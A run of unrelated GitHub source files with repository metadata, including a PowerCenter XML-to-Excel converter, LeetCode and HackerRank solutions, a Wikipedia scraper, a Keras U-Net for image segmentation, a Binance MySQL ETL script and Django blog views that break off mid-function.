fig = plt.figure()
ax1 = fig.add_subplot(2, 2, 1)
ax1.imshow(state.front)
ax1 = fig.add_subplot(2, 2, 2)
ax1.imshow(state.back)
ax1 = fig.add_subplot(2, 2, 3)
ax1.imshow(state.right)
ax1 = fig.add_subplot(2, 2, 4)
ax1.imshow(state.left)
plt.show(block=False)
plt.pause(0.1)
'''
state = next_state
print(episode, score)
| chagmgang/baselines | baselines/env/simple_drone.py | simple_drone.py | py | 3,699 | python | en | code | 1 | github-code | 36 |
15006294998 | import pandas as pd
from bs4 import BeautifulSoup as bs
#Criando objeto BS
def get_file(file_name):
content = []
with open(file_name, 'r') as file:
content = file.readlines()
content = ''.join(content)
soup = bs(content,'xml')
return soup
#Buscando parents
def get_parents(soup):
parents = []
for p in soup.parents:
if p.has_attr("NAME") and p.find('TRANSFORMATION'):
parents.append(p["NAME"])
return parents
#Buscando valores
def get_values(soup, tag1):
mapping = soup.find_all(tag1)
names = []
descriptions = []
parents = []
for map in mapping:
names.append(map.get('NAME'))
descriptions.append(map.get('DESCRIPTION'))
parents.append(get_parents(map)) #soup>map
list_values = [parents, names, descriptions]
return list_values
#Criando DF
def create_df(list_values):
dict = {
'PARENTS': list_values[0],
'NAME': list_values[1],
'DESCRIPTION': list_values[2]
}
df = pd.DataFrame(dict)
return df
#Criando excel
def create_file(filename, df):
return df.to_excel(excel_writer=filename, sheet_name=filename, header=True)
#Separando colunas
def transform_column_parents(file):
df_origin = pd.read_excel(file)
list_column = df_origin['PARENTS'].values.tolist()
list_column = [eval(item) for item in list_column]
try:
df_column = pd.DataFrame(list_column, columns=['MAPPING', 'FOLDER', 'REPOSITORY'])
df_clean = df_origin.drop(['PARENTS'], axis=1)
df_clean = df_origin.drop(['Unnamed: 0'], axis=1)
df_complete = pd.concat([df_column, df_clean], axis=1)
except:
df_column = pd.DataFrame(list_column, columns=['FOLDER', 'REPOSITORY'])
df_clean = df_origin.drop(['PARENTS'], axis=1)
df_clean = df_origin.drop(['Unnamed: 0'], axis=1)
df_complete = pd.concat([df_column, df_clean], axis=1)
else:
print('working')
df_clean = df_origin.drop(['PARENTS'], axis=1)
df_clean = df_origin.drop(['Unnamed: 0'], axis=1)
df_complete = pd.concat([df_column, df_clean], axis=1)
return df_complete
if __name__ == '__main__':
#Strings
name = '../mapping.XML'
tag_mapping = 'MAPPING'
tag_transformation = 'TRANSFORMATION'
tag_target = 'TARGET'
tag_source = 'SOURCE'
filename_mapping = 'mapping.xlsx'
filename_transformation = 'transformation.xlsx'
filename_target = 'target.xlsx'
filename_source = 'source.xlsx'
#Criando objeto soup
soup = get_file(name)
#buscando valores de mapping, criando df e criando xlsx
list_mapping = get_values(soup, tag_mapping)
df_mapping = create_df(list_mapping)
create_file(filename_mapping, df_mapping)
#buscando valores de transformation, criando df e criando xlsx
list_transformation = get_values(soup, tag_transformation)
df_transformation = create_df(list_transformation)
create_file(filename_transformation, df_transformation)
#buscando valores de target, criando df e criando xlsx
list_target = get_values(soup, tag_target)
df_target = create_df(list_target)
create_file(filename_target, df_target)
#buscando valores de source, criando df e criando xlsx
list_source = get_values(soup, tag_source)
df_source = create_df(list_source)
create_file(filename_source, df_source)
#Bloco para dividir em tabelas os parents
file1 = '../source.xlsx'
file2 = '../mapping.xlsx'
file3 = '../transformation.xlsx'
file4 = '../target.xlsx'
#Sources
df1 = transform_column_parents(file1)
create_file(df1, 'source.xlsx')
#Mappings
df2 = transform_column_parents(file2)
create_file(df2, 'mapping.xlsx')
#Transformations
df3 = transform_column_parents(file3)
create_file(df3, 'transformation.xlsx')
#Targets
df4 = transform_column_parents(file4)
create_file(df4, 'target.xlsx') | jonesamandajones/powercenter | create_excel.py | create_excel.py | py | 3,991 | python | en | code | 0 | github-code | 36 |
35610933721 | class Codec:
def serialize(self, root):
"""Encodes a tree to a single string.
:type root: TreeNode
:rtype: str
"""
ret = []
if root == None : return ""
q = deque()
q.append(root)
while q :
k = len(q)
for i in range (k):
node = q.popleft()
if node:
ret.append(str(node.val))
q.append(node.left)
q.append(node.right)
else:
ret.append("N")
return ",".join(ret)
def deserialize(self, data):
"""Decodes your encoded data to tree.
:type data: str
:rtype: TreeNode
"""
nodes = data.split(",")
if not nodes[0]:
return None
q = deque()
root = TreeNode(nodes[0])
q.append(root)
i = 1
while i < len(nodes[1:]):
if not q :
return root
curnode = q.popleft()
if nodes[i] != "N":
curnode.left = TreeNode(int(nodes[i]))
q.append(curnode.left)
i+=1
if nodes[i] != "N":
curnode.right = TreeNode(int(nodes[i]))
q.append(curnode.right)
i+=1
return root
| is-yusuf/Random-leetcoding- | Iterative serialize.py | Iterative serialize.py | py | 1,418 | python | en | code | 0 | github-code | 36 |
74160129703 | '''
Algorithm: just count how many characters(frequency more than one regard it as one)
'''
#!/bin/python3
import sys
from collections import Counter
def stringConstruction(s):
# Complete this function
return len(Counter(s).values())
if __name__ == "__main__":
q = int(input().strip())
for a0 in range(q):
s = input().strip()
result = stringConstruction(s)
print(result)
| CodingProgrammer/HackerRank_Python | (Strings)String_Construction(Counter_FK1).py | (Strings)String_Construction(Counter_FK1).py | py | 413 | python | en | code | 0 | github-code | 36 |
947951498 | #!/home/shailja/.virtualenv/my_env/bin/python3
import requests
import bs4
import sys
content = sys.argv[1]
def display_actual_text(text,para_no):
text = text[para_no]
[s.extract() for s in text(['style', 'script', '[document]', 'head', 'title'])]
visible_text = text.getText()
print(visible_text)
wiki_url = 'https://en.wikipedia.org/wiki/{}'
request = requests.get(wiki_url.format(content))
soup = bs4.BeautifulSoup(request.text,'lxml')
actual_text=soup.select('p')
# this is to handle if wikipedia don't have any article with this name
try:
display_actual_text(actual_text,1)
except:
print(f"Wikipedia does not have an article with this exact name.")
exit(1)
# wiki_url = 'https://en.wikipedia.org/wiki/Special:Search?go=Go&search={}&ns0=1'
# request = requests.get(wiki_url.format(content))
# soup = bs4.BeautifulSoup(request.text,'lxml')
# #relevant_text=soup.select("div", {"id": "bodyContent"}) #soup.select('#mw-body')
# #relevant_text=relevant_text.select("div.searchresults")
# content = soup.select(".mw-search-result")[0].select('td')[1]
# title=content.a['title']
# relevant_text=content.select(".searchresult")[0]
# [s.extract() for s in relevant_text(['style', 'script', '[document]', 'head', 'title'])]
# visible_text = relevant_text.getText()
# print(title)
# print(visible_text)
# for more data
show_next = False
para_no = 2
# this is to handle if search is found and reaches to the end of content in wikipidea
try:
while not show_next:
show_next = input("!")
print()
display_actual_text(actual_text,para_no)
para_no+=1
except:
print("End")
| SKT27182/web_scaping | wiki_search.py | wiki_search.py | py | 1,728 | python | en | code | 0 | github-code | 36 |
71592171944 | #!/bin/python3
import math
import os
import random
import re
import sys
from collections import deque
# Complete the bfs function below.
def bfs(n, m, edges, s):
#Create adjacency list empty on array
neighbors = [[] for i in range(n) for j in range(1)]
#Include neighbors of each vertex, with index minus 1
for e in edges:
neighbors[e[0]-1].append(e[1]-1)
neighbors[e[1]-1].append(e[0]-1)
#Seen and Distance begin in False and -1 each
seen = [False for i in range(n)]
distance = [-1 for i in range(n)]
#Start vertex as True and distance 0
seen[s - 1] = True
distance[s - 1] = 0
print(seen)
print(distance)
q = deque()
q.append(s - 1)
while len(q):
v = q.popleft()
for u in neighbors[v]:
if seen[u] == False:
distance[u] = distance[v] + 6
seen[u] = True
q.append(u)
seen[v] = True
return [distance[i] for i in range(n) if i != s-1]
if __name__ == '__main__':
fptr = open(os.environ['OUTPUT_PATH'], 'w')
q = int(input())
for q_itr in range(q):
nm = input().split()
n = int(nm[0])
m = int(nm[1])
edges = []
for _ in range(m):
edges.append(list(map(int, input().rstrip().split())))
s = int(input())
result = bfs(n, m, edges, s)
fptr.write(' '.join(map(str, result)))
fptr.write('\n')
fptr.close() | Gabospa/computer_science | bfs.py | bfs.py | py | 1,506 | python | en | code | 0 | github-code | 36 |
16931221429 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Wed Jan 24 23:39:39 2018
@author: yorklk
"""
import os
import numpy as np
from skimage.morphology import label
from keras.models import Model, load_model
from keras.layers import Input, Activation, Add, BatchNormalization
from keras.layers.core import Dropout
from keras.layers.convolutional import Conv2D, Conv2DTranspose
from keras.layers.pooling import MaxPooling2D
from keras.layers.merge import concatenate
from keras.callbacks import EarlyStopping, ModelCheckpoint
from keras.preprocessing.image import ImageDataGenerator
from keras.optimizers import Adam
from keras.applications.mobilenet import MobileNet
import keras.backend as KB
import tensorflow as tf
X_train = np.load('data/X_128.npy')
Y_train = np.load('data/Y_128.npy')
X_test = np.load('data/test_128.npy')
np.random.seed(seed = 71)
epochs = 500
learning_rate = 1e-3
learning_rates = [1e-3]
decay = 5e-5
patience = 15
dropout_rate = 0.015
batch_size = 8
K=4
pre_proc = dict(horizontal_flip = True,
vertical_flip = True,
width_shift_range = 0.1,
height_shift_range = 0.1,
channel_shift_range= 0.0,
zoom_range = 0.0,
rotation_range = 0.0)
####################################################################
# Precision helper function
def precision_at(threshold, iou):
matches = iou > threshold
true_positives = np.sum(matches, axis=1) == 1
false_positives = np.sum(matches, axis=0) == 0
false_negatives = np.sum(matches, axis=1) == 0
tp, fp, fn = np.sum(true_positives), np.sum(false_positives), np.sum(false_negatives)
return tp, fp, fn
def iou_metric(y_true_in, y_pred_in):
labels = label(y_true_in > 0.5)
y_pred = label(y_pred_in > 0.5)
true_objects = len(np.unique(labels))
pred_objects = len(np.unique(y_pred))
intersection = np.histogram2d(labels.flatten(), y_pred.flatten(), bins=(true_objects, pred_objects))[0]
# Compute areas
area_true = np.histogram(labels, bins = true_objects)[0]
area_pred = np.histogram(y_pred, bins = pred_objects)[0]
area_true = np.expand_dims(area_true, -1)
area_pred = np.expand_dims(area_pred, 0)
# Compute union
union = area_true + area_pred - intersection
# Exclude background from the analysis
intersection = intersection[1:,1:]
union = union[1:,1:]
union[union == 0] = 1e-9
# Compute the intersection over union
iou = intersection / union
# Loop over IoU thresholds
prec = []
for t in np.arange(0.5, 1.0, 0.05):
tp, fp, fn = precision_at(t, iou)
if (tp + fp + fn) > 0:
p = tp / (tp + fp + fn)
else:
p = 0
prec.append(p)
return np.mean(prec)
def iou_metric_batch(y_true_in, y_pred_in):
batch_size = y_true_in.shape[0]
metric = []
for batch in range(batch_size):
value = iou_metric(y_true_in[batch], y_pred_in[batch])
metric.append(value)
return np.array(np.mean(metric), dtype=np.float32)
def my_iou_metric(label, pred):
metric_value = iou_metric_batch(label, pred)
return metric_value
#########################################################################################################
def identity_block(X, filters, dropout_rate):
F1, F2, F3 = filters
# First component
X = Conv2D(F1, kernel_size = (3, 3), strides = (1,1), padding = 'same')(X)
X = BatchNormalization(axis = 3)(X)
X = Activation('elu')(X)
X = Dropout(rate = dropout_rate)(X)
# Second component
X = Conv2D(F2, (3, 3), strides = (1,1), padding = 'same')(X)
X = BatchNormalization(axis = 3)(X)
X = Activation('elu')(X)
X = Dropout(rate = dropout_rate)(X)
# Third component
X = Conv2D(F3, (1,1), strides = (1,1), padding = 'valid')(X)
X = BatchNormalization(axis = 3)(X)
X = Activation('elu')(X)
X = Dropout(rate = dropout_rate)(X)
return X
def deconvolution_block(X, filters, dropout_rate):
F1, F2, F3 = filters
# Save the input value
X_shortcut = X
# First component, deconvolution
X = Conv2DTranspose(F1,
(2, 2),
strides=(2, 2),
padding='same')(X)
X = BatchNormalization(axis = 3)(X)
X = Activation('elu')(X)
X = Dropout(rate = dropout_rate)(X)
# Second component
X = Conv2D(F2, (3, 3), strides = (1,1), padding = 'same')(X)
X = BatchNormalization(axis = 3)(X)
X = Activation('elu')(X)
X = Dropout(rate = dropout_rate)(X)
# Third component
X = Conv2D(F3, (1,1), strides = (1,1), padding = 'valid')(X)
X = BatchNormalization(axis = 3)(X)
# Shortcut deconvolution
X_shortcut = Conv2DTranspose(F3,
(2, 2),
strides=(2, 2),
padding='same')(X_shortcut)
X_shortcut = BatchNormalization(axis = 3)(X_shortcut)
# Add shortcut value to main path, and ELU activation
X = Add()([X_shortcut, X])
X = Activation('elu')(X)
X = Dropout(rate = dropout_rate)(X)
return X
def uNet_Model(input_shape = (128, 128, 3), dropout_rate = dropout_rate):
'''
uNet with MobileNet (pretrained on imagenet) as downsampling side
Outputs saved from five layers to concatenate on upsampling side:
activations at conv_pw_1, conv_pw_3, conv_pw_5, conv_pw_11, conv_pw_13
ResNet convolution blocks with Conv2DTranspose and elu used for upsampling side
'''
base_model = MobileNet(weights = 'imagenet',
include_top = False,
input_shape = (128, 128, 3))
# Base model, with 5 layers out
X1 = base_model.get_layer('conv_pw_1_relu').output # 64x64, 64 filters
X2 = base_model.get_layer('conv_pw_3_relu').output # 32x32, 128 filters
X3 = base_model.get_layer('conv_pw_5_relu').output # 16x16, 256 filters
X4 = base_model.get_layer('conv_pw_11_relu').output # 8x8, 512 filters
X5 = base_model.get_layer('conv_pw_13_relu').output # 4x4, 1024 filters
# Bottom block
X = identity_block(X5, filters = [256, 256, 1024], dropout_rate = dropout_rate) # 4x4
X = Add()([X, X5]) # 4x4
# Deconvolution block 1
X = deconvolution_block(X, filters = [128, 128, 512], dropout_rate = dropout_rate) # 8x8
X = Add()([X, X4]) # 8x8
# Deconvolution block 2
X = deconvolution_block(X, filters = [64, 64, 256], dropout_rate = dropout_rate) # 16x16
X = Add()([X, X3]) # 16x16
# Deconvolution block 3
X = deconvolution_block(X, filters= [32, 32, 128], dropout_rate = dropout_rate) # 32x32
X = Add()([X, X2]) # 32x32
# Deconvolution block 4
X = deconvolution_block(X, filters = [16, 16, 64], dropout_rate = dropout_rate) # 64x64
X = Add()([X, X1]) # 64x64
# Final deconvolution block
X = deconvolution_block(X, filters = [16, 16, 64], dropout_rate = dropout_rate) # 128x128
predictions = Conv2D(1, (1, 1), activation='sigmoid')(X)
model = Model(input = base_model.input, output = predictions)
return model
#####################################################################################################
def train_uNet(X_train_cv, Y_train_cv, X_dev, Y_dev, parameters, batch_size, train_generator, file_path):
# Train model using Adam optimizer and early stopping
model = uNet_Model(input_shape=(128, 128, 3), dropout_rate = parameters['dropout_rate'])
model.compile(loss='binary_crossentropy',
optimizer=Adam(lr = parameters['learning_rate'], decay = parameters['decay']),
metrics=['accuracy'])
model.fit_generator(generator = train_generator,
steps_per_epoch = int(X_train_cv.shape[0]/batch_size),
epochs = epochs,
shuffle = True,
verbose = 2,
validation_data = (X_dev, Y_dev),
validation_steps = int(X_train_cv.shape[0]/batch_size),
callbacks = [EarlyStopping('val_loss', patience=parameters['patience'], mode="min"),
ModelCheckpoint(file_path, save_best_only=True)])
return model
def get_folds(X_train, Y_train, K):
# Shuffles data then returns K folds of X,Y-train, X,Y-dev
folds = []
m = X_train.shape[0]
permutation = list(np.random.permutation(m))
X_shuffled = X_train[permutation, :, :, :]
Y_shuffled = Y_train[permutation, :, :, :]
fold_length = int(m/K)
for j in range(K):
cv_idx = list(range(j*fold_length, (j+1)*fold_length))
train_idx = list(range(0, j*fold_length)) + list(range((j+1)*fold_length, m))
X_train_cv = X_shuffled[train_idx, :, :, :]
Y_train_cv = Y_shuffled[train_idx, :, :, :]
X_dev = X_shuffled[cv_idx, :, :, :]
Y_dev = Y_shuffled[cv_idx, :, :, :]
fold = [X_train_cv, Y_train_cv, X_dev, Y_dev]
folds.append(fold)
return folds
def get_file_path(j, parameters, directory):
print('\nFold:\t{}\nlearning_rate:\t{learning_rate}\ndropout_rate:\t{dropout_rate}\naugmentation:\t{aug}'.format(str(j), **parameters))
if not os.path.exists(directory):
os.makedirs(directory)
file_path = directory + '/weights_'+str(j)+'.hdf5'
return file_path
def rename_weight_path(j, metrics, file_path, directory):
print('\nFold:\t{}\nTrain Loss:\t{train_loss:.4}\nDev Loss:\t{dev_loss:.4}\nMean IoU:\t{IoU:.4}\n'.format(str(j), **metrics))
new_weight_path = '{}_{}_{dev_loss:.4}_{IoU:.4}{hdf5}'.format('/weights', str(j), **metrics)
os.rename(file_path, directory + new_weight_path)
return
def print_final_metrics(parameters, metrics, directory):
print('\n\nlearning_rate: {learning_rate}\ndropout_rate: {dropout_rate}\naugmentation: {aug}'.format(**parameters))
print('avg_dev_loss:\t{avg_dev_loss}\nmean_IoU:\t{IoU_log}\n\n\n'.format(**metrics))
name = 'loss={avg_dev_loss:.6}_IoU={IoU_log:.6}'.format(**metrics)
new_path = directory+'--'+name
os.rename(directory, new_path)
return
def get_metrics(model, X_train_cv, Y_train_cv, X_dev, Y_dev, file_path, metrics):
# Load the best model weights saved by early stopping
K = metrics['K']
model.load_weights(filepath=file_path)
# Get train and dev loss
train_eval = model.evaluate(X_train_cv, Y_train_cv, verbose=0)
metrics['train_loss'] = train_eval[0]
dev_eval = model.evaluate(X_dev, Y_dev, verbose=0)
metrics['dev_loss'] = dev_eval[0]
metrics['avg_dev_loss'] += metrics['dev_loss']/K
# Get Intersection over Union
preds_dev = model.predict(X_dev)
Y_pred = preds_dev >= 0.5
Y_true = Y_dev
IoU = my_iou_metric(Y_true, Y_pred)
metrics['IoU'] = IoU
metrics['IoU_log'] += IoU/K
return metrics
############################################################################
for learning_rate in learning_rates:
aug = ''
if pre_proc['width_shift_range'] != 0.0:
aug += '_{}={width_shift_range}'.format(aug, 'shift', **pre_proc)
if pre_proc['zoom_range'] != 0.0:
aug += '_{}={zoom_range}'.format(aug, 'zoom', **pre_proc)
if pre_proc['rotation_range'] != 0.0:
aug += '_{}={rotation_range}'.format(aug, 'rotation', **pre_proc)
if pre_proc['horizontal_flip']:
aug += '_{}={horizontal_flip}'.format(aug, 'h-flip', **pre_proc)
if pre_proc['vertical_flip']:
aug += '_{}={vertical_flip}'.format(aug, 'v-flip', **pre_proc)
parameters = {'learning_rate':learning_rate, 'dropout_rate':dropout_rate, 'aug':aug, 'decay':decay, 'patience':patience}
directory = 'model_5/{learning_rate}_{dropout_rate}/{aug}'.format(**parameters)
metrics = {'train_loss': 0, 'dev_loss': 0, 'avg_dev_loss': 0, 'IoU': 0, 'IoU_log': 0, 'K': K,
'hdf5': '.hdf5'}
# Create image and mask data generators for preprocessing
image_datagen = ImageDataGenerator(**pre_proc)
mask_datagen = ImageDataGenerator(**pre_proc)
image_datagen.fit(X_train, augment = True)
mask_datagen.fit(Y_train, augment = True)
image_generator = image_datagen.flow(X_train,
batch_size = batch_size)
mask_generator = mask_datagen.flow(Y_train,
batch_size = batch_size)
train_generator = zip(image_generator, mask_generator)
# Create folds and train
folds = get_folds(X_train, Y_train, K)
for j in range(K):
X_train_cv = folds[j][0]
Y_train_cv = folds[j][1]
X_dev = folds[j][2]
Y_dev = folds[j][3]
file_path = get_file_path(j, parameters, directory)
model = train_uNet(X_train_cv, Y_train_cv, X_dev, Y_dev, parameters, batch_size,
train_generator, file_path)
metrics = get_metrics(model, X_train_cv, Y_train_cv, X_dev, Y_dev, file_path, metrics)
rename_weight_path(j, metrics, file_path, directory)
print_final_metrics(parameters, metrics, directory)
| yorklk/dsb2018-U-Net | U-Net.py | U-Net.py | py | 13,208 | python | en | code | 0 | github-code | 36 |
13988415228 | # kinda lame, this was supposedly done in logarithmic time, though did not
# get totally rt the trick
class Solution:
def getNoZeroIntegers(self, n: int) -> List[int]:
for x in range(n - 1, 0, -1):
y = n - x
if '0' in str(x) or '0' in str(y):
continue
else:
return (x, y)
| dariomx/topcoder-srm | leetcode/trd-pass/easy/convert-integer-to-the-sum-of-two-no-zero-integers/convert-integer-to-the-sum-of-two-no-zero-integers.py | convert-integer-to-the-sum-of-two-no-zero-integers.py | py | 354 | python | en | code | 0 | github-code | 36 |
9157699619 | import argparse
from typing import List
import config
import mysql.connector
from collections import OrderedDict
from binance_data import BinanceData
from sqlalchemy import create_engine
from sqlalchemy.orm import sessionmaker
def load(data: List['BinanceData']):
# db connection
# db batch insert new table
# TODO: cnx
# TODO organize it using bulk_insert_mappings
# TODO: learn with clause
cnx = mysql.connector.connect(
host=config.host,
user=config.user,
password=config.passwd,
database="binance_transformed_data")
cursor = cnx.cursor()
# Define insert statement
insert_statement = (
"INSERT INTO binance_transformed_data (symbol, open_time, close_time, open_price, close_price, low_price, high_price, volume, quote_asset_volume, number_of_trades, taker_buy_base_asset_volume, taker_buy_quote_asset_volume, unused) "
"VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s)"
)
# Prepare the values to be inserted
data_values = [(d.symbol, d.open_time, d.close_time, d.open_price, d.close_price, d.low_price, d.high_price, d.volume, d.quote_asset_volume, d.number_of_trades, d.taker_buy_base_asset_volume, d.taker_buy_quote_asset_volume, d.unused) for d in data]
# Execute the batch insert
cursor.executemany(insert_statement, data_values)
cnx.commit()
cursor.close()
cnx.close()
# engine = create_engine('mysql+mysqlconnector://username:password@localhost/dbname')
# Session = sessionmaker(bind=engine)
# session = Session()
# for d in data:
# session.add(d)
# session.commit()
# session.close()
# engine = create_engine('mysql+mysqlconnector://username:password@localhost/dbname')
# Session = sessionmaker(bind=engine)
# session = Session()
#
# try:
# # Prepare data for batch insert
# insert_data = [
# {
# 'symbol': obj.symbol,
# 'open_time': obj.open_time,
# 'open_price': obj.open_price,
# 'high_price': obj.high_price,
# 'low_price': obj.low_price,
# 'close_price': obj.close_price,
# 'volume': obj.volume,
# 'close_time': obj.close_time,
# 'quote_asset_volume': obj.quote_asset_volume,
# 'number_of_trades': obj.number_of_trades,
# 'taker_buy_base_asset_volume': obj.taker_buy_base_asset_volume,
# 'taker_buy_quote_asset_volume': obj.taker_buy_quote_asset_volume,
# 'unused': obj.unused
# }
# for obj in data
# ]
#
# # Perform batch insert
# session.bulk_insert_mappings(binance_data, insert_data)
# session.commit()
# except:
# session.rollback()
# raise
# finally:
# session.close()
def transform(data: List['BinanceData'], interval:int) -> List['BinanceData']:
# interval combine, e.g.: combine five 1min data into one 5min data
# str -> double
if interval <= 0:
raise ValueError() #TODO
transformed_data = []
for i in range(0, len(data), interval):
chunk = data[i:min(i+interval, len(data))]
first = chunk[0]
last = chunk[-1]
low_price = high_price = first.low_price
volume = quote_asset_volume = number_of_trades = taker_buy_base_asset_volume = taker_buy_quote_asset_volume = 0
for d in chunk:
low_price = min(low_price, d.low_price)
high_price = max(high_price, d.high_price)
volume += d.volume
quote_asset_volume += d.quote_asset_volume
number_of_trades += d.number_of_trades
taker_buy_base_asset_volume += d.taker_buy_base_asset_volume
taker_buy_quote_asset_volume += d.taker_buy_quote_asset_volume
combined = BinanceData(
symbol=first.symbol,
open_time=first.open_time,
close_time=last.close_time,
open_price=first.open_price,
close_price=last.close_price,
low_price=low_price,
high_price=high_price,
volume=volume,
quote_asset_volume=quote_asset_volume,
number_of_trades=number_of_trades,
taker_buy_base_asset_volume=taker_buy_base_asset_volume,
taker_buy_quote_asset_volume=taker_buy_quote_asset_volume,
unused=last.unused
)
combined.open_price = first.open_price
transformed_data.append(combined)
return transformed_data
def get_in_time_range(symbol, startTime: int, endTime: int, limit=500) -> List['BinanceData']:
'''
Get a list of BinanceData from the database within a specified time range.
:param start_time: The start of the time range (unix time).
:param end_time: The end of the time range (unix time).
:return: a list of BinanceData
'''
# session = Session()
cnx = mysql.connector.connect(
host=config.host,
user=config.user,
password=config.passwd,
database="binance_source_data")
cursor = cnx.cursor(dictionary=True)
offset = 0
data = []
# while True:
# try:
# # Query the database for BinanceData objects within the specified time range
# chunk = session.query(BinanceData).filter(BinanceData.open_time >= startTime,
# BinanceData.open_time <= endTime) \
# .order_by(BinanceData.open_time) \
# .offset(offset) \
# .limit(limit) \
# .all()
# finally:
# session.close()
query = ("SELECT * FROM binance_data "
"WHERE open_time >= %s AND open_time <= %s AND symbol = %s "
"ORDER BY open_time ASC "
"LIMIT %s OFFSET %s")
while True:
cursor.execute(query, (startTime, endTime, symbol, limit, offset))
chunk = cursor.fetchall()
if not chunk:
break
for row in chunk:
binance_data_dict = OrderedDict([
('symbol', row['symbol']),
('open_time', row['open_time']),
('open_price', row['open_price']),
('high_price', row['high_price']),
('low_price', row['low_price']),
('close_price', row['close_price']),
('volume', row['volume']),
('close_time', row['close_time']),
('quote_asset_volume', row['quote_asset_volume']),
('number_of_trades', row['number_of_trades']),
('taker_buy_base_asset_volume', row['taker_buy_base_asset_volume']),
('taker_buy_quote_asset_volume', row['taker_buy_quote_asset_volume']),
('unused', row['unused'])
])
binance_data_obj = BinanceData(**binance_data_dict)
data.append(binance_data_obj)
offset += limit
cnx.close()
return data
# if not chunk:
# break
#
# data.extend(chunk)
# offset += limit
#
# return data
# try:
# # Query the database for BinanceData objects within the specified time range
# data = session.query(BinanceData).filter(BinanceData.open_time >= startTime,
# BinanceData.open_time <= endTime).all()
# finally:
# session.close()
#
# return data
def transform_job(symbol, startTime, endTime, interval):
# TODO: complete this logic
# get data from database List of binance data
# for-loop/while-loop
# 1.1000
# 2.1000
data = get_in_time_range(symbol, startTime, endTime)
transformed_data = transform(data, interval)
load(transformed_data)
# for i in range(0, len(data), 1000):
# chunk = data[i:i + 1000] # TODO min(i+1000, len(data))
# transformed_data = transform(chunk, interval)
# load(transformed_data)
# resListOfData = transform(listOfData, interval)
# load(resListOfData)
# pass
def main():
args = parse_args()
symbol, startTime, endTime, interval = args.symbol, int(args.startTime), int(args.endTime), int(args.interval)
if startTime >= endTime:
raise ValueError(f"startTime returns trades from that time and endTime returns trades starting from the endTime"
f"including all trades before that time. startTime must be smaller than endTime")
# if endTime - startTime > 500mins, 1D = 24*60 = 1440mins
transform_job(symbol=symbol, startTime=startTime, endTime=endTime, interval=interval)
def parse_args():
parser = argparse.ArgumentParser()
parser.add_argument('--symbol', type=str)
parser.add_argument('--startTime', type=int)
parser.add_argument('--endTime', type=int)
parser.add_argument('--interval', type=int)
return parser.parse_args()
if __name__ == '__main__':
main() | Sherry-W071/Real-time-Cryptocurrency-Data-Aggregation-and-Processing-Pipeline | transform_load.py | transform_load.py | py | 9,045 | python | en | code | 0 | github-code | 36 |
28886388336 | # from urllib import request
from django.shortcuts import render, redirect
from .models import Post, Comment
from .forms import CommentForm, PostUpdateForm
# from django.http import HttpResponseRedirect
from django.contrib.auth.decorators import login_required
# LoginRequiredMixin is simply the class based version for login_required decorator.
# because we cannot use decorators with classes, we are using mixins instead.
# UserPassesTestMixin mixin is for making sure that only the author can edit the posts
from django.contrib.auth.mixins import (LoginRequiredMixin,
UserPassesTestMixin)
from django.views.generic import (ListView,
# DetailView,
CreateView,
UpdateView,
DeleteView)
#! FBV for listing blog posts
def home(request):
context = {
'posts': Post.objects.all()
}
return render(request, 'blog/home.html', context)
#! CBV for listing blog posts
class PostListView(ListView):
model = Post
template_name = 'blog/home.html' # if I had left this field empty, django would have looked for 'blog/post_list' template cuz it looks for <app>/<model>_<viewtype.html> by default
context_object_name = 'posts' # by default, django uses the name "object_list". If this field was left empty, I'd have to use object_list to loop through my posts in home.html
ordering = ['-date_posted']
#! CBV for individual blog posts
# class PostDetailView(LoginRequiredMixin, DetailView):
# model = Post
# form = CommentForm
# # actually, for this one let's create the defualt html template file django is looking for. And since this
# # is a detailview, django's gonna look for a template named 'blog/post_detail.html'.
# # not defining our context_object_name, we'll have to use 'object' for every post in our blog/post_detail.html template
# #? view count part
# def get_object(self):
# views = super().get_object()
# views.blog_view += 1
# views.save()
# print(CommentForm)
# print(Post.objects.get(id = views.pk) == views)
# # if request.method == 'POST':
# # print(CommentForm(request.POST))
# # if form.is_valid():
# # comment=form.save(commit=False)
# # comment.blog = views
# # comment.save()
# return views
#! FBV for individual blog posts
@login_required
def blog_detail(request, pk):
post = Post.objects.get(id=pk)
print(post.post_image)
form = CommentForm()
form_blog= PostUpdateForm()
comments = Comment.objects.filter(post=post.id)
post.blog_view += 1
post.save()
if request.method == 'POST':
form = CommentForm(request.POST)
print('yay1')
if form.is_valid():
print('yay2')
comment = form.save(commit=False)
comment.post = post
post.blog_comment +=1
comment.user = request.user
post.blog_view -= 2
post.save()
comment.save()
return redirect("post-detail", pk)
return render(request, 'blog/post_detail.html', {'post': post, 'form': form, 'comments': comments})
#! CBV for creating blog posts
class PostCreateView(LoginRequiredMixin, CreateView): # make sure you add your mixins to the left. They should be inherited first, in other words
model = Post
fields = ('title', 'content', 'post_image')
success_url = '/'
# we are getting a "NOT NULL constraint failed: blog_post.author_id" after posting a blog post which
# means that the post needs an author and django by default cannot know who the author is. Therefore,
# we'll need to override the form_valid method and set the author before saving it
def form_valid(self, form):
form.instance.author = self.request.user
return super().form_valid(form)
#! CBV for updating blog posts
class PostUpdateView(LoginRequiredMixin, UserPassesTestMixin, UpdateView):
model = Post
fields = ('title', 'content', 'post_image')
def form_valid(self, form):
form.instance.author = self.request.user
return super().form_valid(form)
def test_func(self): # UserPassesTestMixin requires to override the test_func, thus we are defining it here
post = self.get_object()
if self.request.user == post.author:
return True
return False
#! CBV for deleting blog posts
class PostDeleteView(LoginRequiredMixin, UserPassesTestMixin, DeleteView):
model = Post
# fields = ('title', 'content')
success_url = '/'
def test_func(self):
post = self.get_object()
if self.request.user == post.author:
return True
return False
def like_post(request, id):
if request.method == "POST":
instance = Post.objects.get(id=id)
# print(request.user.id, id)
# print(instance.author)
# print(instance.likes.id)
if not instance.likes.filter(id=request.user.id).exists():
instance.likes.add(request.user)
instance.save()
# print(instance)
return render( request, 'blog/likes_area.html', context={'post':instance})
else:
instance.likes.remove(request.user)
instance.save()
# print(instance)
return render( request, 'blog/likes_area.html', context={'post':instance})
# def post_comment(request, id):
# model = Comment.objects.get(id=id)
# comment = CommentForm(instance=model)
# if request.method == "POST":
# comment = CommentForm(request.POST, instance=model)
# # instance = CommentForm(request, id=id)
# if comment.is_valid():
# comment.save()
# return render( request, 'blog/post_comment.html', context={'comment':comment})
# class CommentView(CreateView):
# model = Comment
# template_name = 'blog/post_comment.html'
# fields = ('post', 'body','date_added')
def about(request):
